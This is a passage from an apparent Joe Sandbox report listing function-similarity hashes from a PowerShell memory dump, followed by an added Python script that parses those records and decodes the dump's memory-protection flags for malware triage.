                                                                • Instruction Fuzzy Hash: 6C5167F17253068FE7A46A6A880067ABBE6EFC1610B9884FFD405CB345DA36C805C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$d%eq$d%eq$d%eq$tP_q$$_q
                                                                • API String ID: 0-3686356251
                                                                • Opcode ID: 14e71625b13065525f5821679f53192bf4db087afbf6e47778d28275d824461f
                                                                • Instruction ID: ef477b58afac9567aee41ca0d6bbe18dc035c7fdb6eb05880dec0b0f8a4bac0c
                                                                • Opcode Fuzzy Hash: 14e71625b13065525f5821679f53192bf4db087afbf6e47778d28275d824461f
                                                                • Instruction Fuzzy Hash: 0E5103F0B14201DFEB64AF24C450AAABBA2EF89715F1884DBD8159F6D1C731DC85CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-3565727911
                                                                • Opcode ID: cf26f4b4cb4e0fb5cd9f0f0a71c2ee32b40090a3bee7f1d3ed54222c17256824
                                                                • Instruction ID: 4510d360a4c7e1b312b32aa599c00d5a57d2549cabfd6f83a6d69c6beca4fb09
                                                                • Opcode Fuzzy Hash: cf26f4b4cb4e0fb5cd9f0f0a71c2ee32b40090a3bee7f1d3ed54222c17256824
                                                                • Instruction Fuzzy Hash: A3619EF0700206DBFFA8AE14C545BAA77B2EB49712F5888E6E8145B2D4C771DC94CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$d%eq$d%eq$d%eq$tP_q
                                                                • API String ID: 0-1359258200
                                                                • Opcode ID: 9a2af0a1179f8b5cd540dbcb33b22a0cab5096c007f538321cac3228b0ce21c3
                                                                • Instruction ID: 5ca49c8484472f5deb19758ff9cae3feac11d0e6f752087029615579a5ca9f42
                                                                • Opcode Fuzzy Hash: 9a2af0a1179f8b5cd540dbcb33b22a0cab5096c007f538321cac3228b0ce21c3
                                                                • Instruction Fuzzy Hash: 0531B3F4B00214DFE768EF58C454A5ABBA2EF8C714F248596E815AB390CB32DC42CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o_q$(o_q$(o_q$(o_q
                                                                • API String ID: 0-3600592161
                                                                • Opcode ID: b54005b646c6b40b87e82e058865b546fa9fbfd6e03b775b7e9b0b7e3cb53c17
                                                                • Instruction ID: da30a9bd5f074c2a58bf753d5ef352a36ffd9bc38ffc4f5cccda82272c3fbb05
                                                                • Opcode Fuzzy Hash: b54005b646c6b40b87e82e058865b546fa9fbfd6e03b775b7e9b0b7e3cb53c17
                                                                • Instruction Fuzzy Hash: 11F125F170420ADFEB55AF68C8447AABFA2EF81311F1484EBE4158B295DB31D851CBB1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XRdq$XRdq$tP_q$$_q
                                                                • API String ID: 0-4159955686
                                                                • Opcode ID: f9ffe7a635d564be857591212e272d24be6c5ee193ccf8154cc11789c1eaddc8
                                                                • Instruction ID: bb328a90d3b6891d5d7723b5fbcdb04ceb5ea89bf71ccd58b7c70287ffe7a149
                                                                • Opcode Fuzzy Hash: f9ffe7a635d564be857591212e272d24be6c5ee193ccf8154cc11789c1eaddc8
                                                                • Instruction Fuzzy Hash: C341C2F1A00206DFEB65EF18C104AA9BBF2EB49711F19C0EAE418AF255C731DD41CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XRdq$XRdq$tP_q$$_q
                                                                • API String ID: 0-4159955686
                                                                • Opcode ID: 0085a80d61ae7b7b77a77f9ebf13d88cc805f7f29e645ea5bffe441e0ff6939b
                                                                • Instruction ID: a2c2711fd157170558681f7bab9ecbcbc57e15d1007fd7ae4b877ee284f6d13f
                                                                • Opcode Fuzzy Hash: 0085a80d61ae7b7b77a77f9ebf13d88cc805f7f29e645ea5bffe441e0ff6939b
                                                                • Instruction Fuzzy Hash: 7641B2F1A00216DBEBA4EF59C144BAAB7F2EB49710F19C0E9E8186B254C731ED41CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q$$_q
                                                                • API String ID: 0-1171383116
                                                                • Opcode ID: c12bc9bf2bc7f3d033676eb03e663213ce80762d4078d99c7e9ae4d3e5d55271
                                                                • Instruction ID: cad5b520fe685554af028e17d7dba6604201536761cdd0b211ce1d0957c83977
                                                                • Opcode Fuzzy Hash: c12bc9bf2bc7f3d033676eb03e663213ce80762d4078d99c7e9ae4d3e5d55271
                                                                • Instruction Fuzzy Hash: 2B2157F131120E9BFB68766E8C40B27A6DADBC0715F3084BEA519CB285DD75C842C360
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q$$_q
                                                                • API String ID: 0-1171383116
                                                                • Opcode ID: 519c025e883949e4a66146df10fa4bb41e519d6554f160e0b30c7f700519c057
                                                                • Instruction ID: e4b21bd51f3a8cfb37a9aa65fcb8f1eb12fe8a156b24b2b7e3b8cfc1cdaa832e
                                                                • Opcode Fuzzy Hash: 519c025e883949e4a66146df10fa4bb41e519d6554f160e0b30c7f700519c057
                                                                • Instruction Fuzzy Hash: F111DCF5A2130BDBEBA4AE558540666B7E5EFC5650F9840EAE8089B301C732C945CB52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$$_q$$_q
                                                                • API String ID: 0-1173716036
                                                                • Opcode ID: b2bf50203bd87e2d81973ac624dc2233531f15fecfdc49f2d816791c7b6162aa
                                                                • Instruction ID: ab4cd71bef8a652e4d825fd7d3eb9e402b5e72e29aa71532ae8476a6c974d418
                                                                • Opcode Fuzzy Hash: b2bf50203bd87e2d81973ac624dc2233531f15fecfdc49f2d816791c7b6162aa
                                                                • Instruction Fuzzy Hash: 780126F070A34A5FD32D166D44242266FF69FC2A10B1588EFD091DF295CD55CC07CB96
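The records above all come from one memory dump, 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, a region at 0x07B80000 in the PowerShell process (analysis process 6) that is not PE-backed. Triaging hundreds of such blocks by hand is slow, so the following parser, an added example and not part of the Joe Sandbox report or tooling, reads the Strings / Memory Dump Source / Similarity records as they appear on this page, groups functions that reference the same strings (same API String ID) but have different opcodes, and decodes the dump file name. The record layout is taken from the report text; the dot-separated layout of the .sdmp name beyond the process index, base address and the documented Win32 protection and memory-type constants is an assumption and is labelled as such in the code. The embedded sample is copied from the records on this page.

```python
"""Parse Joe Sandbox 'IDA Plugin' function-similarity records.

Added example, not part of the Joe Sandbox report. Record layout is taken
from the report text; the .sdmp file-name field order (apart from the
process index, base address, protection and memory type) is an assumption.
"""
import re
from collections import defaultdict

# Documented Win32 constants (MEMORY_BASIC_INFORMATION.Protect / .Type).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SOURCE_RE = re.compile(
    r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", re.I)


def parse_records(text):
    """Return one dict per function record.

    A record starts at a 'Strings' heading and ends at its
    'Instruction Fuzzy Hash' bullet; every bullet is 'Label: value'.
    Headings without a colon (Memory Dump Source, Similarity, ...) are skipped.
    """
    records, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•-").strip()
        if not line:
            continue
        if line == "Strings":           # new record begins
            cur = {}
            continue
        m = SOURCE_RE.search(line)
        if m:                           # split the Memory Dump Source line
            cur["source_file"] = m.group(1)
            cur["offset"] = int(m.group(2), 16)
            cur["based_on_pe"] = m.group(3).lower() == "true"
            continue
        if ":" in line:
            label, _, value = line.partition(":")
            cur[label.strip()] = value.strip()
            if label.strip() == "Instruction Fuzzy Hash":   # last bullet of a record
                records.append(cur)
                cur = {}
    return records


def group_by_api_string_id(records):
    """Map API String ID -> list of Opcode IDs: same referenced strings, different code."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("API String ID", "")].append(r.get("Opcode ID", ""))
    return dict(groups)


def parse_sdmp_name(name):
    """Decode a Joe Sandbox .sdmp file name.

    ASSUMED layout: procidx.run.timestamp.base.protect.unknown.type.unknown.sdmp
    Only the process index, base, protect and type fields are relied upon.
    """
    parts = name.rsplit(".sdmp", 1)[0].split(".")
    if len(parts) != 8:
        raise ValueError("unexpected .sdmp name: %s" % name)
    protect, mtype = int(parts[4], 16), int(parts[6], 16)
    return {"pid": int(parts[0]), "base": int(parts[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype))}


# Sample input: three records copied from this report page.
SAMPLE = """
Strings
Memory Dump Source
• Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'_q$TQdq$TQdq$tP_q$$_q$$_q$$_q
• API String ID: 0-2694711154
• Opcode ID: b32c2bd605cbaf9a5dd9d892ded143e86829f28b41ef52013957ff119dbf93c6
• Instruction ID: 7755a4bc1182006b8139a67ebe35168d70f80ebdd121845fdefe729a53f01e69
• Opcode Fuzzy Hash: b32c2bd605cbaf9a5dd9d892ded143e86829f28b41ef52013957ff119dbf93c6
• Instruction Fuzzy Hash: B951BFF070020ADBEBA8AE04C544BAA77B2FB49315F5885E7E8099B2D1D771DD80CB91
Strings
Memory Dump Source
• Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'_q$TQdq$TQdq$tP_q$$_q$$_q$$_q
• API String ID: 0-2694711154
• Opcode ID: 292514974b51d8cf8949313ddf01906159aad1c223ec102b10558d320e67ff43
• Instruction ID: f7fb38bd864ded0c640a9c4a86f1105ef193262d25ae1504ded0d2d551c0bb4e
• Opcode Fuzzy Hash: 292514974b51d8cf8949313ddf01906159aad1c223ec102b10558d320e67ff43
• Instruction Fuzzy Hash: 95518FF070060ADBEBA8AE05C544BAA77B2FB49315F5885E7E8099B2D0D771DD80CB91
Strings
Memory Dump Source
• Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
Similarity
• API ID:
• String ID: $_q$$_q$$_q$$_q$$_q$$_q
• API String ID: 0-155944776
• Opcode ID: ffd04d11511729a2dbe7d1b42d1d2581d0f211e34c6b47d6c031ba61f9cebeda
• Instruction ID: 53b4d131a5a16f515b31d2affdccdecca86bbca082b5cda212158a5c7f1334de
• Opcode Fuzzy Hash: ffd04d11511729a2dbe7d1b42d1d2581d0f211e34c6b47d6c031ba61f9cebeda
• Instruction Fuzzy Hash: 6C5167F17253068FE7A46A6A880067ABBE6EFC1610B9884FFD405CB345DA36C805C7A1
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(parse_sdmp_name(recs[0]["source_file"]))
    for sid, opcodes in group_by_api_string_id(recs).items():
        print(sid, len(opcodes), "function(s)")
```

For the records on this page the decode gives process index 6, base 0x07B80000, PAGE_EXECUTE_READWRITE and MEM_PRIVATE with "based on PE: false", i.e. executable code in a private, writable region of powershell.exe that no module on disk accounts for, which is the memory picture behind the report's "unpacking or dynamic code loading" finding. The grouping surfaces pairs such as API String ID 0-2694711154, where two functions with different Opcode IDs reference the same strings, a pattern worth a closer look when deciding which of many near-identical functions to disassemble first.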